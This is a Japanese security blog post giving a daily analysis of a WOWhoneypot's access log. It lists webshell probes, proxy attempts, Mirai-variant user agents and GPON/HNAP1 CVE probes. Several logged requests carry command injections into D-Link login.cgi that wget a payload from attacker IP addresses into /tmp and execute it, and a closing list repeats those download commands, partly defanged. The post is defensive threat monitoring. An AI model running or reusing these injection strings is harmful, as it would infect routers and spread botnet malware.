S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/09/04)

ハニーポットのログ分析(2018/09/04)

honeypot

WOWhoneypotの2018/09/04(運用91日目)の簡易分析です。
本日の総アクセス件数は 190件です。
本日より、ドメイン名を設定しています。どこにも公開等はまだしていないため、現状では特段変化ありませんが、様子を見ながら広めるなりしながら、傾向を見ていきたいと思います。

以下が全アクセスログです。

39 2018-09-04 GET /
4 2018-09-04 POST /qq.php
4 2018-09-04 CONNECT www.baidu.com:443
3 2018-09-04 POST /qaq.php
2 2018-09-04 POST /xx.php
2 2018-09-04 POST /q.php
2 2018-09-04 GET /shell.php
2 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
2 2018-09-04 GET hxxp://www.ip.cn/
2 2018-09-04 GET hxxp://www.baidu.com/
2 2018-09-04 GET hxxp://www.123cha.com/
2 2018-09-04 GET /cmd.php
2 2018-09-04 CONNECT cn.bing.com:443
1 2018-09-04 PROPFIND /
1 2018-09-04 POST /zuoshou.php
1 2018-09-04 POST /zuo.php
1 2018-09-04 POST /zuoindex.php
1 2018-09-04 POST /zshmindex.php
1 2018-09-04 POST /yumo.php
1 2018-09-04 POST /yao.php
1 2018-09-04 POST /xz.php
1 2018-09-04 POST /xw.php
1 2018-09-04 POST /xw1.php
1 2018-09-04 POST /xshell.php
1 2018-09-04 POST /xiao.php
1 2018-09-04 POST /xiaomar.php
1 2018-09-04 POST /xiaoma.php
1 2018-09-04 POST /xiaomae.php
1 2018-09-04 POST /wuwu11.php
1 2018-09-04 POST /wshell.php
1 2018-09-04 POST /w.php
1 2018-09-04 POST /wp-admins.php
1 2018-09-04 POST /weixiao.php
1 2018-09-04 POST /webslee.php
1 2018-09-04 POST /wc.php
1 2018-09-04 POST /wan.php
1 2018-09-04 POST /wanan.php
1 2018-09-04 POST /tiandi.php
1 2018-09-04 POST /test.php
1 2018-09-04 POST /system.php
1 2018-09-04 POST /ssaa.php
1 2018-09-04 POST /s.php
1 2018-09-04 POST /sheep.php
1 2018-09-04 POST /sean.php
1 2018-09-04 POST /qwe.php
1 2018-09-04 POST /python.php
1 2018-09-04 POST /post.php
1 2018-09-04 POST /phpStudy.php
1 2018-09-04 POST /phpstudy.php
1 2018-09-04 POST /phpinfi.php
1 2018-09-04 POST /pe.php
1 2018-09-04 POST /mz.php
1 2018-09-04 POST /mx.php
1 2018-09-04 POST /m.php?pbid=open
1 2018-09-04 POST /min.php
1 2018-09-04 POST /log.php
1 2018-09-04 POST /linuxse.php
1 2018-09-04 POST /lindex.php
1 2018-09-04 POST /l7.php
1 2018-09-04 POST /ip.php
1 2018-09-04 POST /infoo.php
1 2018-09-04 POST /hm.php
1 2018-09-04 POST /hh.php
1 2018-09-04 POST /h1.php
1 2018-09-04 POST /GponForm/diag_Form?images/
1 2018-09-04 POST /feixiang.php
1 2018-09-04 POST /fack.php
1 2018-09-04 POST /defect.php
1 2018-09-04 POST /default.php
1 2018-09-04 POST /db_session.init.php
1 2018-09-04 POST /db.init.php
1 2018-09-04 POST /db__.init.php
1 2018-09-04 POST /db_desql.php
1 2018-09-04 POST /db_dataml.php
1 2018-09-04 POST /data.php
1 2018-09-04 POST /conflg.php
1 2018-09-04 POST /cmd.php
1 2018-09-04 POST /ceshi.php
1 2018-09-04 POST /cainiao.php
1 2018-09-04 POST /bak.php
1 2018-09-04 POST /aw.php
1 2018-09-04 POST /app.php
1 2018-09-04 POST /aotu.php
1 2018-09-04 POST /angge.php
1 2018-09-04 POST /ak.php
1 2018-09-04 POST /ak48.php
1 2018-09-04 POST /ak47.php
1 2018-09-04 POST /aaaa.php
1 2018-09-04 POST /9678.php
1 2018-09-04 POST /9510.php
1 2018-09-04 POST /56.php
1 2018-09-04 POST /3.php
1 2018-09-04 POST /12.php
1 2018-09-04 POST /1213.php
1 2018-09-04 GET /z.php
1 2018-09-04 GET /x.php
1 2018-09-04 GET /wpo.php
1 2018-09-04 GET /wp-config.php
1 2018-09-04 GET /webdav/
1 2018-09-04 GET /uploader.php
1 2018-09-04 GET /text.php
1 2018-09-04 GET /test.php
1 2018-09-04 GET /_query.php
1 2018-09-04 GET /pmd_online.php
1 2018-09-04 GET /phpmyadmin
1 2018-09-04 GET /muhstiks.php
1 2018-09-04 GET /muhstik.php
1 2018-09-04 GET /muhstik-dpr.php
1 2018-09-04 GET /muhstik2.php
1 2018-09-04 GET /lol.php
1 2018-09-04 GET /log.php
1 2018-09-04 GET /logon.php
1 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-09-04 GET /license.php
1 2018-09-04 GET /lala.php
1 2018-09-04 GET /lala-dpr.php
1 2018-09-04 GET /knal.php
1 2018-09-04 GET /java.php
1 2018-09-04 GET hxxp://www.123cha.com
1 2018-09-04 GET hxxp://179.34.150.254:7000/1g6vwtfqmb32sbdkcvvahva6yvgozm6ge
1 2018-09-04 GET hxxp://112.35.63.31:10083/index.php
1 2018-09-04 GET hxxp://112.35.53.83:10083/index.php
1 2018-09-04 GET /HNAP1/
1 2018-09-04 GET /help.php
1 2018-09-04 GET /help-e.php
1 2018-09-04 GET /graphs/
1 2018-09-04 GET /favicon.ico
1 2018-09-04 GET /desktop.ini.php
1 2018-09-04 GET /db_pma.php
1 2018-09-04 GET /db_cts.php
1 2018-09-04 GET /cmx.php
1 2018-09-04 GET /cmv.php
1 2018-09-04 GET /cmdd.php
1 2018-09-04 GET /appserv.php 

 

phpMyAdmin関連(3件)とphpのWebshell関連(122件)と/へのアクセスを除外したアクセス数です。

4 2018-09-04 CONNECT www.baidu[.]com:443
2 2018-09-04 CONNECT cn.bing[.]com:443
2 2018-09-04 GET hxxp://www.ip[.]cn/
2 2018-09-04 GET hxxp://www.baidu[.]com/
2 2018-09-04 GET hxxp://www.123cha[.]com/
2 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-04 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-09-04 GET hxxp://www.123cha.com
1 2018-09-04 GET hxxp://179.34.150[.]254:7000/1g6vwtfqmb32sbdkcvvahva6yvgozm6ge
1 2018-09-04 GET hxxp://112.35.63[.]31:10083/index.php
1 2018-09-04 GET hxxp://112.35.53[.]83:10083/index.php
1 2018-09-04 POST /GponForm/diag_Form?images/
1 2018-09-04 GET /webdav/
1 2018-09-04 GET /HNAP1/
1 2018-09-04 GET /graphs/

昨日から引き続き、CONNECT系が多いです。

本日のD-Linkルータを狙うMirai亜種は以下です。

2 User-Agent: LMAO/2.0
2 User-Agent: Hakai/2.0

他のIoT系でいうと、以下の攻撃/調査行為が来ています。
「POST /GponForm/diag_Form?images/」はGPONルータの脆弱性(CVE-2018-10561, CVE-2018-10562)を突くものが1件、
「GET /HNAP1/」はD-Link ルータにおける SOAPAction に対するコマンド実行の試み(CVE-2015-2051)

「GET /graphs/」については、何を対象にした調査行為か調査しましたが、不明でした。

 

本日のハンティングログは以下です。

2 2018-09-04 wget hxxp://212.237.32[.]62/k
1 2018-09-04 wget hxxp://77.87.77[.]250/izuku.sh
1 2018-09-04 wget hxxp://148.72.176[.]78/ngynx  

以上です。